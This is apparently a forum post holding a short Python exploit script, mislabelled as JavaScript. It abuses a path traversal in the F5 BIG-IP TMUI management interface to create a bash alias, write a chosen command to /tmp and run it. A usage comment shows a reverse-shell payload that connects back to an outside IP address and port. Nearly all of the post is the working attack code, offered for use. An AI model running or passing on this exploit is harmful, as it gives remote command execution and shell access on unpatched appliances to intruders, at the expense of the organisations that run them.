- 注册
- 09 10, 2024
- 消息
- 186
JavaScript:
import requests
import sys
import random
# python exp.py "https://1.2.4.1:22212/" "bash+-i>%26+/dev/tcp/1.1.2.3/23333+0>%261"
ip = sys.argv[1]
cmd = sys.argv[2]
num_str = ''.join(str(random.choice(range(10))) for _ in range(8))
poc1_url = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
poc2_url = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content=%s" %(num_str,cmd)
poc3_url = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/" + num_str
poc4_url = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp%2f" + num_str
poc5_url = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list"
poc_lists = [poc1_url,poc2_url,poc3_url,poc4_url, poc5_url]
for poc in poc_lists:
try:
content = requests.get(url=ip+poc, verify=False).content
print(content)
except Exception as e:
print(e)
